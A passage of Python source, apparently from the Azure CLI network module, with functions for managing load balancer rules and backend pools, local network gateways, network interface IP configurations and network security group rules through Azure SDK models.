c.set_param('idle_timeout_in_minutes', idle_timeout)
c.set_param('load_distribution', load_distribution)
c.set_param('enable_tcp_reset', enable_tcp_reset)
c.set_param('enable_floating_ip', floating_ip)
if frontend_ip_name is not None:
instance.frontend_ip_configuration = \
get_property(parent.frontend_ip_configurations, frontend_ip_name)
if backend_address_pool_name is not None:
instance.backend_address_pool = \
get_property(parent.backend_address_pools, backend_address_pool_name)
    # Keep compatibility when bumping the API version from '2020-11-01' to '2021-02-01'
# https://github.com/Azure/azure-rest-api-specs/issues/14430
if cmd.supported_api_version(min_api='2021-02-01') and not backend_pools_name:
instance.backend_address_pools = [instance.backend_address_pool]
if backend_pools_name is not None:
instance.backend_address_pools = [get_property(parent.backend_address_pools, i) for i in backend_pools_name]
if probe_name == '':
instance.probe = None
elif probe_name is not None:
instance.probe = get_property(parent.probes, probe_name)
return parent
# endregion
# pylint: disable=line-too-long
def add_lb_backend_address_pool_address(cmd, resource_group_name, load_balancer_name, backend_address_pool_name,
address_name, ip_address, vnet=None, subnet=None):
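    """Add an address to a load balancer backend address pool.

    On API versions '2020-11-01' and later the address may reference either a
    vnet (with an optional subnet name or ID) or a full subnet resource ID;
    on older API versions only a vnet reference is supported. The updated pool
    is sent back with begin_create_or_update.
    """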
client = network_client_factory(cmd.cli_ctx).load_balancer_backend_address_pools
address_pool = client.get(resource_group_name, load_balancer_name, backend_address_pool_name)
(LoadBalancerBackendAddress,
Subnet,
VirtualNetwork) = cmd.get_models('LoadBalancerBackendAddress',
'Subnet',
'VirtualNetwork')
if cmd.supported_api_version(min_api='2020-11-01'):
if vnet:
new_address = LoadBalancerBackendAddress(name=address_name,
subnet=Subnet(id=_process_subnet_name_and_id(subnet, vnet, cmd, resource_group_name)) if subnet else None,
virtual_network=VirtualNetwork(id=vnet),
ip_address=ip_address if ip_address else None)
elif is_valid_resource_id(subnet):
new_address = LoadBalancerBackendAddress(name=address_name,
subnet=Subnet(id=subnet),
ip_address=ip_address if ip_address else None)
else:
            raise UnrecognizedArgumentError('Each backend address must have a name, an ip-address, and either a vnet name plus subnet name or a subnet id.')
else:
new_address = LoadBalancerBackendAddress(name=address_name,
virtual_network=VirtualNetwork(id=vnet) if vnet else None,
ip_address=ip_address if ip_address else None)
if address_pool.load_balancer_backend_addresses is None:
address_pool.load_balancer_backend_addresses = []
address_pool.load_balancer_backend_addresses.append(new_address)
return client.begin_create_or_update(resource_group_name, load_balancer_name,
backend_address_pool_name, address_pool)
def remove_lb_backend_address_pool_address(cmd, resource_group_name, load_balancer_name,
backend_address_pool_name, address_name):
client = network_client_factory(cmd.cli_ctx).load_balancer_backend_address_pools
address_pool = client.get(resource_group_name, load_balancer_name, backend_address_pool_name)
if address_pool.load_balancer_backend_addresses is None:
address_pool.load_balancer_backend_addresses = []
lb_addresses = [addr for addr in address_pool.load_balancer_backend_addresses if addr.name != address_name]
address_pool.load_balancer_backend_addresses = lb_addresses
return client.begin_create_or_update(resource_group_name, load_balancer_name,
backend_address_pool_name, address_pool)
def list_lb_backend_address_pool_address(cmd, resource_group_name, load_balancer_name,
backend_address_pool_name):
client = network_client_factory(cmd.cli_ctx).load_balancer_backend_address_pools
address_pool = client.get(resource_group_name, load_balancer_name, backend_address_pool_name)
return address_pool.load_balancer_backend_addresses
def create_lb_outbound_rule(cmd, resource_group_name, load_balancer_name, item_name,
backend_address_pool, frontend_ip_configurations, protocol,
outbound_ports=None, enable_tcp_reset=None, idle_timeout=None):
OutboundRule, SubResource = cmd.get_models('OutboundRule', 'SubResource')
client = network_client_factory(cmd.cli_ctx).load_balancers
lb = lb_get(client, resource_group_name, load_balancer_name)
rule = OutboundRule(
protocol=protocol, enable_tcp_reset=enable_tcp_reset, idle_timeout_in_minutes=idle_timeout,
backend_address_pool=SubResource(id=backend_address_pool),
frontend_ip_configurations=[SubResource(id=x) for x in frontend_ip_configurations]
if frontend_ip_configurations else None,
allocated_outbound_ports=outbound_ports, name=item_name)
upsert_to_collection(lb, 'outbound_rules', rule, 'name')
poller = client.begin_create_or_update(resource_group_name, load_balancer_name, lb)
return get_property(poller.result().outbound_rules, item_name)
def set_lb_outbound_rule(instance, cmd, parent, item_name, protocol=None, outbound_ports=None,
idle_timeout=None, frontend_ip_configurations=None, enable_tcp_reset=None,
backend_address_pool=None):
SubResource = cmd.get_models('SubResource')
with cmd.update_context(instance) as c:
c.set_param('protocol', protocol)
c.set_param('allocated_outbound_ports', outbound_ports)
c.set_param('idle_timeout_in_minutes', idle_timeout)
c.set_param('enable_tcp_reset', enable_tcp_reset)
c.set_param('backend_address_pool', SubResource(id=backend_address_pool)
if backend_address_pool else None)
c.set_param('frontend_ip_configurations',
[SubResource(id=x) for x in frontend_ip_configurations] if frontend_ip_configurations else None)
return parent
def create_lb_probe(cmd, resource_group_name, load_balancer_name, item_name, protocol, port,
path=None, interval=None, threshold=None):
Probe = cmd.get_models('Probe')
ncf = network_client_factory(cmd.cli_ctx)
lb = lb_get(ncf.load_balancers, resource_group_name, load_balancer_name)
new_probe = Probe(
protocol=protocol, port=port, interval_in_seconds=interval, number_of_probes=threshold,
request_path=path, name=item_name)
upsert_to_collection(lb, 'probes', new_probe, 'name')
poller = ncf.load_balancers.begin_create_or_update(resource_group_name, load_balancer_name, lb)
return get_property(poller.result().probes, item_name)
def set_lb_probe(cmd, instance, parent, item_name, protocol=None, port=None,
path=None, interval=None, threshold=None):
with cmd.update_context(instance) as c:
c.set_param('protocol', protocol)
c.set_param('port', port)
c.set_param('request_path', path)
c.set_param('interval_in_seconds', interval)
c.set_param('number_of_probes', threshold)
return parent
def create_lb_rule(
cmd, resource_group_name, load_balancer_name, item_name,
protocol, frontend_port, backend_port, frontend_ip_name=None,
backend_address_pool_name=None, probe_name=None, load_distribution='default',
floating_ip=None, idle_timeout=None, enable_tcp_reset=None, disable_outbound_snat=None, backend_pools_name=None):
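    """Create a load balancing rule on a load balancer.

    Frontend IP and backend pool names fall back to defaults resolved from the
    load balancer. When backend_pools_name is provided, the plural
    backend_address_pools property is populated and the singular
    backend_address_pool is cleared to avoid a service-side conflict.
    """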
LoadBalancingRule = cmd.get_models('LoadBalancingRule')
ncf = network_client_factory(cmd.cli_ctx)
lb = cached_get(cmd, ncf.load_balancers.get, resource_group_name, load_balancer_name)
lb = lb_get_operation(lb)
if not frontend_ip_name:
frontend_ip_name = _get_default_name(lb, 'frontend_ip_configurations', '--frontend-ip-name')
    # avoid breaking when backend_address_pool_name is None and backend_pools_name is not None
if not backend_address_pool_name and backend_pools_name:
backend_address_pool_name = backend_pools_name[0]
if not backend_address_pool_name:
backend_address_pool_name = _get_default_name(lb, 'backend_address_pools', '--backend-pool-name')
new_rule = LoadBalancingRule(
name=item_name,
protocol=protocol,
frontend_port=frontend_port,
backend_port=backend_port,
frontend_ip_configuration=get_property(lb.frontend_ip_configurations,
frontend_ip_name),
backend_address_pool=get_property(lb.backend_address_pools,
backend_address_pool_name),
probe=get_property(lb.probes, probe_name) if probe_name else None,
load_distribution=load_distribution,
enable_floating_ip=floating_ip,
idle_timeout_in_minutes=idle_timeout,
enable_tcp_reset=enable_tcp_reset,
disable_outbound_snat=disable_outbound_snat)
if backend_pools_name:
new_rule.backend_address_pools = [get_property(lb.backend_address_pools, name) for name in backend_pools_name]
        # Otherwise the service will respond with error: (LoadBalancingRuleBackendAdressPoolAndBackendAddressPoolsCannotBeSetAtTheSameTimeWithDifferentValue) BackendAddressPool and BackendAddressPools[] in LoadBalancingRule rule2 cannot be set at the same time with different value.
new_rule.backend_address_pool = None
upsert_to_collection(lb, 'load_balancing_rules', new_rule, 'name')
poller = cached_put(cmd, ncf.load_balancers.begin_create_or_update, lb, resource_group_name, load_balancer_name)
return get_property(poller.result().load_balancing_rules, item_name)
def set_lb_rule(
cmd, instance, parent, item_name, protocol=None, frontend_port=None,
frontend_ip_name=None, backend_port=None, backend_address_pool_name=None, probe_name=None,
load_distribution='default', floating_ip=None, idle_timeout=None, enable_tcp_reset=None,
disable_outbound_snat=None, backend_pools_name=None):
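    """Update an existing load balancing rule.

    None values leave the corresponding property unchanged; an empty string for
    probe_name detaches the probe. On API versions '2021-02-01' and later,
    backend_address_pools is kept in sync with backend_address_pool, and the
    singular property is cleared when explicit backend pools are supplied.
    """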
with cmd.update_context(instance) as c:
c.set_param('protocol', protocol)
c.set_param('frontend_port', frontend_port)
c.set_param('backend_port', backend_port)
c.set_param('idle_timeout_in_minutes', idle_timeout)
c.set_param('load_distribution', load_distribution)
c.set_param('disable_outbound_snat', disable_outbound_snat)
c.set_param('enable_tcp_reset', enable_tcp_reset)
c.set_param('enable_floating_ip', floating_ip)
if frontend_ip_name is not None:
instance.frontend_ip_configuration = \
get_property(parent.frontend_ip_configurations, frontend_ip_name)
if backend_address_pool_name is not None:
instance.backend_address_pool = \
get_property(parent.backend_address_pools, backend_address_pool_name)
    # Keep compatibility when bumping the API version from '2020-11-01' to '2021-02-01'
# https://github.com/Azure/azure-rest-api-specs/issues/14430
if cmd.supported_api_version(min_api='2021-02-01') and not backend_pools_name:
instance.backend_address_pools = [instance.backend_address_pool]
if backend_pools_name is not None:
instance.backend_address_pools = [get_property(parent.backend_address_pools, i) for i in backend_pools_name]
        # Otherwise the service will respond with error: (LoadBalancingRuleBackendAdressPoolAndBackendAddressPoolsCannotBeSetAtTheSameTimeWithDifferentValue) BackendAddressPool and BackendAddressPools[] in LoadBalancingRule rule2 cannot be set at the same time with different value.
instance.backend_address_pool = None
if probe_name == '':
instance.probe = None
elif probe_name is not None:
instance.probe = get_property(parent.probes, probe_name)
return parent
def add_lb_backend_address_pool_tunnel_interface(cmd, resource_group_name, load_balancer_name,
backend_address_pool_name, protocol, identifier, traffic_type, port=None):
client = network_client_factory(cmd.cli_ctx).load_balancer_backend_address_pools
address_pool = client.get(resource_group_name, load_balancer_name, backend_address_pool_name)
GatewayLoadBalancerTunnelInterface = cmd.get_models('GatewayLoadBalancerTunnelInterface')
tunnel_interface = GatewayLoadBalancerTunnelInterface(port=port, identifier=identifier, protocol=protocol, type=traffic_type)
if not address_pool.tunnel_interfaces:
address_pool.tunnel_interfaces = []
address_pool.tunnel_interfaces.append(tunnel_interface)
return client.begin_create_or_update(resource_group_name, load_balancer_name,
backend_address_pool_name, address_pool)
def update_lb_backend_address_pool_tunnel_interface(cmd, resource_group_name, load_balancer_name,
backend_address_pool_name, index, protocol=None, identifier=None, traffic_type=None, port=None):
client = network_client_factory(cmd.cli_ctx).load_balancer_backend_address_pools
address_pool = client.get(resource_group_name, load_balancer_name, backend_address_pool_name)
if index >= len(address_pool.tunnel_interfaces):
        raise UnrecognizedArgumentError(f'{index} is out of range, please provide a valid index')
item = address_pool.tunnel_interfaces[index]
if protocol:
item.protocol = protocol
if identifier:
item.identifier = identifier
if port:
item.port = port
if traffic_type:
item.type = traffic_type
return client.begin_create_or_update(resource_group_name, load_balancer_name,
backend_address_pool_name, address_pool)
def remove_lb_backend_address_pool_tunnel_interface(cmd, resource_group_name, load_balancer_name,
backend_address_pool_name, index):
client = network_client_factory(cmd.cli_ctx).load_balancer_backend_address_pools
address_pool = client.get(resource_group_name, load_balancer_name, backend_address_pool_name)
if index >= len(address_pool.tunnel_interfaces):
        raise UnrecognizedArgumentError(f'{index} is out of range, please provide a valid index')
address_pool.tunnel_interfaces.pop(index)
return client.begin_create_or_update(resource_group_name, load_balancer_name,
backend_address_pool_name, address_pool)
def list_lb_backend_address_pool_tunnel_interface(cmd, resource_group_name, load_balancer_name,
backend_address_pool_name):
client = network_client_factory(cmd.cli_ctx).load_balancer_backend_address_pools
address_pool = client.get(resource_group_name, load_balancer_name, backend_address_pool_name)
return address_pool.tunnel_interfaces
# endregion
# region LocalGateways
def _validate_bgp_peering(cmd, instance, asn, bgp_peering_address, peer_weight):
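    """Apply BGP peering arguments to a local network gateway instance.

    Existing bgp_settings are updated field by field; otherwise a new
    BgpSettings object is created when an ASN is supplied, and a usage error
    is raised when BGP arguments are given without an ASN.
    """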
if any([asn, bgp_peering_address, peer_weight]):
if instance.bgp_settings is not None:
# update existing parameters selectively
if asn is not None:
instance.bgp_settings.asn = asn
if peer_weight is not None:
instance.bgp_settings.peer_weight = peer_weight
if bgp_peering_address is not None:
instance.bgp_settings.bgp_peering_address = bgp_peering_address
elif asn:
BgpSettings = cmd.get_models('BgpSettings')
            # pass keyword arguments, since generated SDK models expect keyword-only parameters
            instance.bgp_settings = BgpSettings(asn=asn, bgp_peering_address=bgp_peering_address, peer_weight=peer_weight)
else:
raise CLIError(
'incorrect usage: --asn ASN [--peer-weight WEIGHT --bgp-peering-address IP]')
def create_local_gateway(cmd, resource_group_name, local_network_gateway_name, gateway_ip_address,
location=None, tags=None, local_address_prefix=None, asn=None,
bgp_peering_address=None, peer_weight=None, no_wait=False):
AddressSpace, LocalNetworkGateway, BgpSettings = cmd.get_models(
'AddressSpace', 'LocalNetworkGateway', 'BgpSettings')
client = network_client_factory(cmd.cli_ctx).local_network_gateways
local_gateway = LocalNetworkGateway(
local_network_address_space=AddressSpace(address_prefixes=(local_address_prefix or [])),
location=location, tags=tags, gateway_ip_address=gateway_ip_address)
if bgp_peering_address or asn or peer_weight:
local_gateway.bgp_settings = BgpSettings(asn=asn, bgp_peering_address=bgp_peering_address,
peer_weight=peer_weight)
return sdk_no_wait(no_wait, client.begin_create_or_update,
resource_group_name, local_network_gateway_name, local_gateway)
def update_local_gateway(cmd, instance, gateway_ip_address=None, local_address_prefix=None, asn=None,
bgp_peering_address=None, peer_weight=None, tags=None):
_validate_bgp_peering(cmd, instance, asn, bgp_peering_address, peer_weight)
if gateway_ip_address is not None:
instance.gateway_ip_address = gateway_ip_address
if local_address_prefix is not None:
instance.local_network_address_space.address_prefixes = local_address_prefix
if tags is not None:
instance.tags = tags
return instance
# endregion
# region NetworkInterfaces (NIC)
def create_nic(cmd, resource_group_name, network_interface_name, subnet, location=None, tags=None,
internal_dns_name_label=None, dns_servers=None, enable_ip_forwarding=False,
load_balancer_backend_address_pool_ids=None,
load_balancer_inbound_nat_rule_ids=None,
load_balancer_name=None, network_security_group=None,
private_ip_address=None, private_ip_address_version=None,
public_ip_address=None, virtual_network_name=None, enable_accelerated_networking=None,
application_security_groups=None, no_wait=False,
app_gateway_backend_address_pools=None, edge_zone=None):
client = network_client_factory(cmd.cli_ctx).network_interfaces
(NetworkInterface, NetworkInterfaceDnsSettings, NetworkInterfaceIPConfiguration, NetworkSecurityGroup,
PublicIPAddress, Subnet, SubResource) = cmd.get_models(
'NetworkInterface', 'NetworkInterfaceDnsSettings', 'NetworkInterfaceIPConfiguration',
'NetworkSecurityGroup', 'PublicIPAddress', 'Subnet', 'SubResource')
dns_settings = NetworkInterfaceDnsSettings(internal_dns_name_label=internal_dns_name_label,
dns_servers=dns_servers or [])
nic = NetworkInterface(location=location, tags=tags, enable_ip_forwarding=enable_ip_forwarding,
dns_settings=dns_settings)
if cmd.supported_api_version(min_api='2016-09-01'):
nic.enable_accelerated_networking = enable_accelerated_networking
if network_security_group:
nic.network_security_group = NetworkSecurityGroup(id=network_security_group)
ip_config_args = {
'name': 'ipconfig1',
'load_balancer_backend_address_pools': load_balancer_backend_address_pool_ids,
'load_balancer_inbound_nat_rules': load_balancer_inbound_nat_rule_ids,
'private_ip_allocation_method': 'Static' if private_ip_address else 'Dynamic',
'private_ip_address': private_ip_address,
'subnet': Subnet(id=subnet),
'application_gateway_backend_address_pools':
[SubResource(id=x) for x in app_gateway_backend_address_pools]
if app_gateway_backend_address_pools else None
}
if cmd.supported_api_version(min_api='2016-09-01'):
ip_config_args['private_ip_address_version'] = private_ip_address_version
if cmd.supported_api_version(min_api='2017-09-01'):
ip_config_args['application_security_groups'] = application_security_groups
ip_config = NetworkInterfaceIPConfiguration(**ip_config_args)
if public_ip_address:
ip_config.public_ip_address = PublicIPAddress(id=public_ip_address)
nic.ip_configurations = [ip_config]
if edge_zone:
nic.extended_location = _edge_zone_model(cmd, edge_zone)
return sdk_no_wait(no_wait, client.begin_create_or_update, resource_group_name, network_interface_name, nic)
def update_nic(cmd, instance, network_security_group=None, enable_ip_forwarding=None,
internal_dns_name_label=None, dns_servers=None, enable_accelerated_networking=None):
if enable_ip_forwarding is not None:
instance.enable_ip_forwarding = enable_ip_forwarding
if network_security_group == '':
instance.network_security_group = None
elif network_security_group is not None:
NetworkSecurityGroup = cmd.get_models('NetworkSecurityGroup')
instance.network_security_group = NetworkSecurityGroup(id=network_security_group)
if internal_dns_name_label == '':
instance.dns_settings.internal_dns_name_label = None
elif internal_dns_name_label is not None:
instance.dns_settings.internal_dns_name_label = internal_dns_name_label
if dns_servers == ['']:
instance.dns_settings.dns_servers = None
elif dns_servers:
instance.dns_settings.dns_servers = dns_servers
if enable_accelerated_networking is not None:
instance.enable_accelerated_networking = enable_accelerated_networking
return instance
def create_nic_ip_config(cmd, resource_group_name, network_interface_name, ip_config_name, subnet=None,
virtual_network_name=None, public_ip_address=None, load_balancer_name=None,
load_balancer_backend_address_pool_ids=None,
load_balancer_inbound_nat_rule_ids=None,
private_ip_address=None,
private_ip_address_version=None,
make_primary=False,
application_security_groups=None,
app_gateway_backend_address_pools=None):
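    """Create an additional IP configuration on an existing NIC.

    For IPv4 configurations without an explicit subnet, the subnet of the
    current primary configuration is reused. When make_primary is set, every
    existing configuration is demoted before the new one is added.
    """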
NetworkInterfaceIPConfiguration, PublicIPAddress, Subnet, SubResource = cmd.get_models(
'NetworkInterfaceIPConfiguration', 'PublicIPAddress', 'Subnet', 'SubResource')
ncf = network_client_factory(cmd.cli_ctx)
nic = ncf.network_interfaces.get(resource_group_name, network_interface_name)
if cmd.supported_api_version(min_api='2016-09-01'):
IPVersion = cmd.get_models('IPVersion')
private_ip_address_version = private_ip_address_version or IPVersion.I_PV4.value
if private_ip_address_version == IPVersion.I_PV4.value and not subnet:
primary_config = next(x for x in nic.ip_configurations if x.primary)
subnet = primary_config.subnet.id
if make_primary:
for config in nic.ip_configurations:
config.primary = False
new_config_args = {
'name': ip_config_name,
'subnet': Subnet(id=subnet) if subnet else None,
'public_ip_address': PublicIPAddress(id=public_ip_address) if public_ip_address else None,
'load_balancer_backend_address_pools': load_balancer_backend_address_pool_ids,
'load_balancer_inbound_nat_rules': load_balancer_inbound_nat_rule_ids,
'private_ip_address': private_ip_address,
'private_ip_allocation_method': 'Static' if private_ip_address else 'Dynamic'
}
if cmd.supported_api_version(min_api='2016-09-01'):
new_config_args['private_ip_address_version'] = private_ip_address_version
new_config_args['primary'] = make_primary
if cmd.supported_api_version(min_api='2017-09-01'):
new_config_args['application_security_groups'] = application_security_groups
if cmd.supported_api_version(min_api='2018-08-01'):
new_config_args['application_gateway_backend_address_pools'] = \
[SubResource(id=x) for x in app_gateway_backend_address_pools] \
if app_gateway_backend_address_pools else None
new_config = NetworkInterfaceIPConfiguration(**new_config_args)
upsert_to_collection(nic, 'ip_configurations', new_config, 'name')
poller = ncf.network_interfaces.begin_create_or_update(
resource_group_name, network_interface_name, nic)
return get_property(poller.result().ip_configurations, ip_config_name)
def update_nic_ip_config_setter(cmd, resource_group_name, network_interface_name, parameters, gateway_lb):
aux_subscriptions = []
if is_valid_resource_id(gateway_lb):
aux_subscriptions.append(parse_resource_id(gateway_lb)['subscription'])
client = network_client_factory(cmd.cli_ctx, aux_subscriptions=aux_subscriptions).network_interfaces
return client.begin_create_or_update(resource_group_name, network_interface_name, parameters)
def set_nic_ip_config(cmd, instance, parent, ip_config_name, subnet=None,
virtual_network_name=None, public_ip_address=None, load_balancer_name=None,
load_balancer_backend_address_pool_ids=None,
load_balancer_inbound_nat_rule_ids=None,
private_ip_address=None,
private_ip_address_version=None, make_primary=False,
application_security_groups=None,
app_gateway_backend_address_pools=None, gateway_lb=None):
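    """Update an IP configuration on a NIC.

    An empty-string argument clears the corresponding property (for example,
    private_ip_address='' switches the allocation back to Dynamic), a None
    argument leaves it unchanged, and any other value replaces it.
    """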
PublicIPAddress, Subnet, SubResource = cmd.get_models('PublicIPAddress', 'Subnet', 'SubResource')
if make_primary:
for config in parent.ip_configurations:
config.primary = False
instance.primary = True
if private_ip_address == '':
# switch private IP address allocation to Dynamic if empty string is used
instance.private_ip_address = None
instance.private_ip_allocation_method = 'dynamic'
if cmd.supported_api_version(min_api='2016-09-01'):
instance.private_ip_address_version = 'ipv4'
elif private_ip_address is not None:
# if specific address provided, allocation is static
instance.private_ip_address = private_ip_address
instance.private_ip_allocation_method = 'static'
if private_ip_address_version is not None:
instance.private_ip_address_version = private_ip_address_version
if subnet == '':
instance.subnet = None
elif subnet is not None:
instance.subnet = Subnet(id=subnet)
if public_ip_address == '':
instance.public_ip_address = None
elif public_ip_address is not None:
instance.public_ip_address = PublicIPAddress(id=public_ip_address)
if load_balancer_backend_address_pool_ids == '':
instance.load_balancer_backend_address_pools = None
elif load_balancer_backend_address_pool_ids is not None:
instance.load_balancer_backend_address_pools = load_balancer_backend_address_pool_ids
if load_balancer_inbound_nat_rule_ids == '':
instance.load_balancer_inbound_nat_rules = None
elif load_balancer_inbound_nat_rule_ids is not None:
instance.load_balancer_inbound_nat_rules = load_balancer_inbound_nat_rule_ids
if application_security_groups == ['']:
instance.application_security_groups = None
elif application_security_groups:
instance.application_security_groups = application_security_groups
if app_gateway_backend_address_pools == ['']:
instance.application_gateway_backend_address_pools = None
elif app_gateway_backend_address_pools:
instance.application_gateway_backend_address_pools = \
[SubResource(id=x) for x in app_gateway_backend_address_pools]
if gateway_lb is not None:
instance.gateway_load_balancer = None if gateway_lb == '' else SubResource(id=gateway_lb)
return parent
def _get_nic_ip_config(nic, name):
if nic.ip_configurations:
ip_config = next(
(x for x in nic.ip_configurations if x.name.lower() == name.lower()), None)
else:
ip_config = None
if not ip_config:
raise CLIError('IP configuration {} not found.'.format(name))
return ip_config
def add_nic_ip_config_address_pool(
cmd, resource_group_name, network_interface_name, ip_config_name, backend_address_pool,
load_balancer_name=None, application_gateway_name=None):
BackendAddressPool = cmd.get_models('BackendAddressPool')
client = network_client_factory(cmd.cli_ctx).network_interfaces
nic = client.get(resource_group_name, network_interface_name)
ip_config = _get_nic_ip_config(nic, ip_config_name)
if load_balancer_name:
upsert_to_collection(ip_config, 'load_balancer_backend_address_pools',
BackendAddressPool(id=backend_address_pool),
'id')
elif application_gateway_name:
upsert_to_collection(ip_config, 'application_gateway_backend_address_pools',
BackendAddressPool(id=backend_address_pool),
'id')
poller = client.begin_create_or_update(resource_group_name, network_interface_name, nic)
return get_property(poller.result().ip_configurations, ip_config_name)
def remove_nic_ip_config_address_pool(
cmd, resource_group_name, network_interface_name, ip_config_name, backend_address_pool,
load_balancer_name=None, application_gateway_name=None):
client = network_client_factory(cmd.cli_ctx).network_interfaces
nic = client.get(resource_group_name, network_interface_name)
ip_config = _get_nic_ip_config(nic, ip_config_name)
if load_balancer_name:
keep_items = [x for x in ip_config.load_balancer_backend_address_pools or [] if x.id != backend_address_pool]
ip_config.load_balancer_backend_address_pools = keep_items
elif application_gateway_name:
keep_items = [x for x in ip_config.application_gateway_backend_address_pools or [] if
x.id != backend_address_pool]
ip_config.application_gateway_backend_address_pools = keep_items
poller = client.begin_create_or_update(resource_group_name, network_interface_name, nic)
return get_property(poller.result().ip_configurations, ip_config_name)
def add_nic_ip_config_inbound_nat_rule(
cmd, resource_group_name, network_interface_name, ip_config_name, inbound_nat_rule,
load_balancer_name=None):
InboundNatRule = cmd.get_models('InboundNatRule')
client = network_client_factory(cmd.cli_ctx).network_interfaces
nic = client.get(resource_group_name, network_interface_name)
ip_config = _get_nic_ip_config(nic, ip_config_name)
upsert_to_collection(ip_config, 'load_balancer_inbound_nat_rules',
InboundNatRule(id=inbound_nat_rule),
'id')
poller = client.begin_create_or_update(resource_group_name, network_interface_name, nic)
return get_property(poller.result().ip_configurations, ip_config_name)
def remove_nic_ip_config_inbound_nat_rule(
cmd, resource_group_name, network_interface_name, ip_config_name, inbound_nat_rule,
load_balancer_name=None):
client = network_client_factory(cmd.cli_ctx).network_interfaces
nic = client.get(resource_group_name, network_interface_name)
ip_config = _get_nic_ip_config(nic, ip_config_name)
keep_items = \
[x for x in ip_config.load_balancer_inbound_nat_rules or [] if x.id != inbound_nat_rule]
ip_config.load_balancer_inbound_nat_rules = keep_items
poller = client.begin_create_or_update(resource_group_name, network_interface_name, nic)
return get_property(poller.result().ip_configurations, ip_config_name)
# endregion
# region NetworkSecurityGroups
def create_nsg(cmd, resource_group_name, network_security_group_name, location=None, tags=None):
client = network_client_factory(cmd.cli_ctx).network_security_groups
NetworkSecurityGroup = cmd.get_models('NetworkSecurityGroup')
nsg = NetworkSecurityGroup(location=location, tags=tags)
return client.begin_create_or_update(resource_group_name, network_security_group_name, nsg)
def _create_singular_or_plural_property(kwargs, val, singular_name, plural_name):
if not val:
return
if not isinstance(val, list):
val = [val]
if len(val) > 1:
kwargs[plural_name] = val
kwargs[singular_name] = None
else:
kwargs[singular_name] = val[0]
kwargs[plural_name] = None
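# Illustrative behaviour of the helper above (values are hypothetical examples):
#   kwargs = {}; _create_singular_or_plural_property(kwargs, '10.0.0.0/24', 'source_address_prefix', 'source_address_prefixes')
#   -> {'source_address_prefix': '10.0.0.0/24', 'source_address_prefixes': None}
#   kwargs = {}; _create_singular_or_plural_property(kwargs, ['80', '443'], 'destination_port_range', 'destination_port_ranges')
#   -> {'destination_port_range': None, 'destination_port_ranges': ['80', '443']}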
def _handle_asg_property(kwargs, key, asgs):
prefix = key.split('_', 1)[0] + '_'
if asgs:
kwargs[key] = asgs
if kwargs[prefix + 'address_prefix'].is_default:
kwargs[prefix + 'address_prefix'] = ''
def create_nsg_rule_2017_06_01(cmd, resource_group_name, network_security_group_name, security_rule_name,
priority, description=None, protocol=None, access=None, direction=None,
source_port_ranges='*', source_address_prefixes='*',
destination_port_ranges=80, destination_address_prefixes='*',
source_asgs=None, destination_asgs=None):
kwargs = {
'protocol': protocol,
'direction': direction,
'description': description,
'priority': priority,
'access': access,
'name': security_rule_name
}
_create_singular_or_plural_property(kwargs, source_address_prefixes,
'source_address_prefix', 'source_address_prefixes')
_create_singular_or_plural_property(kwargs, destination_address_prefixes,
'destination_address_prefix', 'destination_address_prefixes')
_create_singular_or_plural_property(kwargs, source_port_ranges,
'source_port_range', 'source_port_ranges')
_create_singular_or_plural_property(kwargs, destination_port_ranges,
'destination_port_range', 'destination_port_ranges')
# workaround for issue https://github.com/Azure/azure-rest-api-specs/issues/1591
kwargs['source_address_prefix'] = kwargs['source_address_prefix'] or ''
kwargs['destination_address_prefix'] = kwargs['destination_address_prefix'] or ''
if cmd.supported_api_version(min_api='2017-09-01'):
_handle_asg_property(kwargs, 'source_application_security_groups', source_asgs)
_handle_asg_property(kwargs, 'destination_application_security_groups', destination_asgs)
SecurityRule = cmd.get_models('SecurityRule')
settings = SecurityRule(**kwargs)
ncf = network_client_factory(cmd.cli_ctx)
return ncf.security_rules.begin_create_or_update(
resource_group_name, network_security_group_name, security_rule_name, settings)
def create_nsg_rule_2017_03_01(cmd, resource_group_name, network_security_group_name, security_rule_name,
priority, description=None, protocol=None, access=None, direction=None,
source_port_range='*', source_address_prefix='*',
destination_port_range=80, destination_address_prefix='*'):
SecurityRule = cmd.get_models('SecurityRule')
settings = SecurityRule(protocol=protocol, source_address_prefix=source_address_prefix,
destination_address_prefix=destination_address_prefix, access=access,
direction=direction,
description=description, source_port_range=source_port_range,
destination_port_range=destination_port_range, priority=priority,
name=security_rule_name)
ncf = network_client_factory(cmd.cli_ctx)
return ncf.security_rules.begin_create_or_update(
resource_group_name, network_security_group_name, security_rule_name, settings)
def _update_singular_or_plural_property(instance, val, singular_name, plural_name):
if val is None:
return
if not isinstance(val, list):
val = [val]
if len(val) > 1:
setattr(instance, plural_name, val)
setattr(instance, singular_name, None)
else:
setattr(instance, plural_name, None)
setattr(instance, singular_name, val[0])
def update_nsg_rule_2017_06_01(instance, protocol=None, source_address_prefixes=None,
destination_address_prefixes=None, access=None, direction=None, description=None,
source_port_ranges=None, destination_port_ranges=None, priority=None,
source_asgs=None, destination_asgs=None):
# No client validation as server side returns pretty good errors
instance.protocol = protocol if protocol is not None else instance.protocol
instance.access = access if access is not None else instance.access
instance.direction = direction if direction is not None else instance.direction
instance.description = description if description is not None else instance.description
instance.priority = priority if priority is not None else instance.priority
_update_singular_or_plural_property(instance, source_address_prefixes,
'source_address_prefix', 'source_address_prefixes')
_update_singular_or_plural_property(instance, destination_address_prefixes,
'destination_address_prefix', 'destination_address_prefixes')
_update_singular_or_plural_property(instance, source_port_ranges,
'source_port_range', 'source_port_ranges')
_update_singular_or_plural_property(instance, destination_port_ranges,
'destination_port_range', 'destination_port_ranges')
# workaround for issue https://github.com/Azure/azure-rest-api-specs/issues/1591
instance.source_address_prefix = instance.source_address_prefix or ''
instance.destination_address_prefix = instance.destination_address_prefix or ''
if source_asgs == ['']:
instance.source_application_security_groups = None
elif source_asgs:
instance.source_application_security_groups = source_asgs
if destination_asgs == ['']:
instance.destination_application_security_groups = None
elif destination_asgs:
instance.destination_application_security_groups = destination_asgs
return instance
def update_nsg_rule_2017_03_01(instance, protocol=None, source_address_prefix=None,
destination_address_prefix=None, access=None, direction=None, description=None,
source_port_range=None, destination_port_range=None, priority=None):
# No client validation as server side returns pretty good errors
instance.protocol = protocol if protocol is not None else instance.protocol
instance.source_address_prefix = (source_address_prefix if source_address_prefix is not None
else instance.source_address_prefix)
instance.destination_address_prefix = destination_address_prefix \
if destination_address_prefix is not None else instance.destination_address_prefix
instance.access = access if access is not None else instance.access
instance.direction = direction if direction is not None else instance.direction
instance.description = description if description is not None else instance.description
instance.source_port_range = source_port_range \
if source_port_range is not None else instance.source_port_range
instance.destination_port_range = destination_port_range \
if destination_port_range is not None else instance.destination_port_range
